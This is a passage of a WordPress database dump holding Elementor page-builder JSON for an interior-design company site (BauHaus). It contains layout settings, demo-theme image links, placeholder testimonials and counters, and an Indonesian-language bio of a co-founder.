fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3894,4874,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3895,4874,'_elementor_pro_version','3.8.1'),(3896,4875,'_wp_page_template','elementor_header_footer'),(3897,4875,'_elementor_edit_mode','builder'),(3898,4875,'_elementor_template_type','wp-page'),(3899,4875,'_elementor_version','3.8.1'),(3900,4875,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"